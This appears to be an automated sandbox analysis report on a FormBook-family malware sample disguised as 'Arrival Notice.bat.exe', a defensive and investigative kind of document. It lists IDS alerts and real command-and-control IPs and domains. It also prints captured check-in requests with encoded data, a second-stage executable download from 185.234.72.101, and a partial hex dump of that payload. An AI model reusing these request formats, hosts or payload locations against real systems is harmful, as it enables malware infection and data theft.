              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: Arrival Notice.bat.exeJoe Sandbox ML: detected
              Source: Arrival Notice.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Arrival Notice.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: compact.pdbGCTL source: Arrival Notice.bat.exe, 00000008.00000002.2003995560.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144521015.0000000001488000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000000.1929042944.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000000.2071219488.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000019.00000000.3388459052.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 0000001B.00000000.3532932698.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp
              Source: Binary string: runonce.pdbGCTL source: -6qxw.exe, 00000018.00000002.3465848130.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000019.00000002.4144533509.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tZby.pdb source: Arrival Notice.bat.exe, dLrZsz.exe.0.dr
              Source: Binary string: wntdll.pdbUGP source: Arrival Notice.bat.exe, 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2003900659.0000000002837000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2005695081.00000000029EB000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.0000000004A8E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3467174209.000000000473C000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3464510823.0000000004587000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.00000000048F0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: FPJa.pdbSHA256$ source: OdR8akYyHwr3ISR[1].exe.18.dr, -6qxw.exe.18.dr
              Source: Binary string: wntdll.pdb source: Arrival Notice.bat.exe, Arrival Notice.bat.exe, 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2003900659.0000000002837000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2005695081.00000000029EB000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.0000000004A8E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3467174209.000000000473C000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3464510823.0000000004587000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.00000000048F0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: tZby.pdbSHA2562 source: Arrival Notice.bat.exe, dLrZsz.exe.0.dr
              Source: Binary string: compact.pdb source: Arrival Notice.bat.exe, 00000008.00000002.2003995560.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144521015.0000000001488000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: runonce.pdb source: -6qxw.exe, 00000018.00000002.3465848130.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000019.00000002.4144533509.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: FPJa.pdb source: OdR8akYyHwr3ISR[1].exe.18.dr, -6qxw.exe.18.dr
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 4x nop then jmp 0822890Ch0_2_08228B64

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49743 -> 195.35.39.119:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49743 -> 195.35.39.119:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49745 -> 162.241.2.254:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49746 -> 162.241.2.254:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49748 -> 162.241.2.254:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49748 -> 162.241.2.254:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49749 -> 185.137.235.193:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49750 -> 185.137.235.193:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49752 -> 185.137.235.193:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49752 -> 185.137.235.193:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49753 -> 64.46.118.35:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49754 -> 64.46.118.35:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49756 -> 64.46.118.35:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49756 -> 64.46.118.35:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49757 -> 13.228.81.39:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49758 -> 13.228.81.39:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49760 -> 13.228.81.39:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49760 -> 13.228.81.39:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49761 -> 162.0.213.94:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49762 -> 162.0.213.94:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49764 -> 162.0.213.94:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49764 -> 162.0.213.94:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49765 -> 185.234.72.101:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49766 -> 172.82.177.221:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49767 -> 172.82.177.221:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49769 -> 172.82.177.221:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49769 -> 172.82.177.221:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49770 -> 15.204.0.108:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49771 -> 15.204.0.108:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49773 -> 15.204.0.108:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49773 -> 15.204.0.108:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49774 -> 194.9.94.86:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49775 -> 194.9.94.86:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49777 -> 194.9.94.86:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49777 -> 194.9.94.86:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49778 -> 35.214.235.206:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49779 -> 35.214.235.206:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49780 -> 162.241.253.174:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49782 -> 35.214.235.206:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49782 -> 35.214.235.206:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49783 -> 202.95.21.152:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49784 -> 18.178.206.118:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49785 -> 202.95.21.152:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49786 -> 18.178.206.118:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49789 -> 202.95.21.152:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49790 -> 18.178.206.118:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49790 -> 18.178.206.118:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49791 -> 66.96.162.149:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49792 -> 66.96.162.149:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49794 -> 66.29.145.248:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49795 -> 66.96.162.149:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49795 -> 66.96.162.149:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49796 -> 66.29.145.248:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49798 -> 66.29.145.248:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49799 -> 188.114.97.3:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49800 -> 195.35.39.119:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49801 -> 188.114.97.3:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49802 -> 195.35.39.119:80
              Performs DNS queries to domains with low reputation
              Source: DNS query: www.lenovest.xyz
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 19 Jun 2024 20:40:17 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Tue, 18 Jun 2024 06:38:34 GMTETag: "a9e00-61b2454b3e108"Accept-Ranges: bytesContent-Length: 695808Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1f af 78 c5 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 0a 00 00 08 00 00 00 00 00 00 72 b3 0a 00 00 20 00 00 00 c0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1e b3 0a 00 4f 00 00 00 00 c0 0a 00 cc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0a 00 0c 00 00 00 c0 90 0a 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 93 0a 00 00 20 00 00 00 94 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 cc 05 00 00 00 c0 0a 00 00 06 00 00 00 96 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0a 00 00 02 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 b3 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 a4 78 00 00 44 70 00 00 03 00 00 00 1b 00 00 06 e8 e8 00 00 d8 a7 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 92 02 14 7d 01 00 00 04 02 28 1d 00 00 0a 00 00 02 28 07 00 00 06 00 02 7b 14 00 00 04 16 6f 1e 00 00 0a 00 2a 22 00 28 1f 00 00 0a 00 2a 00 00 13 30 02 00 31 00 00 00 01 00 00 11 00 02 7b 15 00 00 04 6f 20 00 00 0a 0a 06 2c 11 00 02 7b 14 00 00 04 17 6f 1e 00 00 0a 00 00 2b 0f 00 02 7b 14 00 00 04 16 6f 1e 00 00 0a 00 00 2a 00 00 00 13 30 02 00 b8 02 00 00 02 00 00 11 00 02 7b 09 00 00 04 6f 21 00 00 0a 72 01 00 00 70 28 22 00 00 0a 0a 06 2c 12 00 72 03 00 00 70 28 23 00 00 0a 26 00 38 8b 02 00 00 02 7b 07 00 00 04 6f 21 00 00 0a 72 01 00 00 70 28 22 00 00 0a 0b 07 2c 12 00 72 2d 00 00 70 28 23 00 00 0a 26 00 38 60 02 00 00 02 7b 05 00 00 04 6f 21 00 00 0a 72 01 00 00 70 28 22 00 00 0a 0c 08 2c 12 00 72 5f 00 00 70 28 23 00 00 0a 26 00 38 35 02 00 00 02 7b 03 00 00 04 6f 21 00 00 0a 72 01 00 00 70 28 22 00 00 0a 0d 09 2c 12 00 72 8b 00 00 70 28 23 00 00 0a 26 00 38 0a 02 00
              Source: Joe Sandbox ViewIP Address: 194.9.94.86 194.9.94.86
              Source: Joe Sandbox ViewIP Address: 202.95.21.152 202.95.21.152
              Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
              Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
              Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
              Source: Joe Sandbox ViewASN Name: HP-INTERNET-ASUS HP-INTERNET-ASUS
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: global trafficHTTP traffic detected: GET /l4k7/?tF1tk6=afjyNtLybwItDht4A4I53iDRENSS8jmKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+QktvoJK9v8ttAQP4wg2bLqAZCOth8+1YyfQ=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1Host: www.futuregainers.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /41br/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=65BU6tOk0p5LPOIJv5eZvte3ybUvohRc7tuB1xkwgoR5MWDkLOQgx5fJDEvOf4AlMkoVXixJXV15AbOmLh5rehilNLqQM6pEfZVUJ4F0gMms0MV4xVJNebQ= HTTP/1.1Host: www.shopnow321.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /4mpz/?tF1tk6=Y+s3rA3a2LtNoPwXEph1agZvu5GuOlYPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4Voi3TiJN+9DCYn4mYX0I3YWd5veeVZiJYYCE=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1Host: www.klimkina.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /0a9p/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=V8kIBUO99PR2h3hwNikpQa7QEoMXp00tAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SbRMe/fNWKGzhA25w4nUiqWWc/J5aoRnGifc= HTTP/1.1Host: www.shahaf3d.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /3h10/?tF1tk6=9mZLXJL8GvO5ODxaoOomsqt4kv5XiFfxC+OCFBImS8kNzrmbjyRfioF27F6qemRmHzSdXM7CT4wlEWpleIDtHTdpL9gTGqilltwgGUv9YmP3AeMh48KIxzc=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1Host: www.againbeautywhiteskin.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /e20q/?tF1tk6=WPritX3A9R+ySLDGPku/GD0rpC4O61Hw5+tRT3chZ2wpNsEUE7uyewm5xlmwIO2sKs7uf3/86JENB8xtRbvRL6LWdHBkCM2rbaWuRFm/Az6wkZG2Vj0/zBQ=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1Host: www.lenovest.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /OdR8akYyHwr3ISR.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like GeckoHost: 185.234.72.101Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /2ha1/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=r6q+x3A/FEQLw6gnIIDKqn7cXK90QEz4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2KETivrZrq09Pe+ZYF4dhJGLDVCdvvTj0Vf0= HTTP/1.1Host: www.931951.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /egr4/?tF1tk6=OombhWzhkCuNqFAREgI5QSI/n6iJ7yj7Rc3Pxm83mLxAAziOmqPFMSLkiV9xX+4t83HRZJys59Cvhm/US+qC0S7x9ud02r6ucB+LtM+AWVrEw63feFc+fJU=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1Host: www.srripaspocon.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /r45o/?tF1tk6=gzu5VRbRlKcxtiemuOhQ9ZWHLhmKbuZrFroidVFNmLFBxOvIucJSpLXaDw+Y+myNYDD7xGaCks3CSH70SMI2onP9LYfMGpPV91FzvjCQRh4kOtmo5I82F50=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1Host: www.torentreprenad.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /nce6/?QTth=cdSXMBmhjDz&gheP1DX=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.ndhockeyprospects.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Source: global trafficHTTP traffic detected: GET /4iea/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=LPPTutp79E4NI/FSO4tKhhCSj88LXvNdsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp+x+MZNm8bqFqjUBXzLeJ0h1+xCuEpOdbPDQ= HTTP/1.1Host: www.grecanici.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /3in6/?gheP1DX=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&QTth=cdSXMBmhjDz HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.qmancha.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
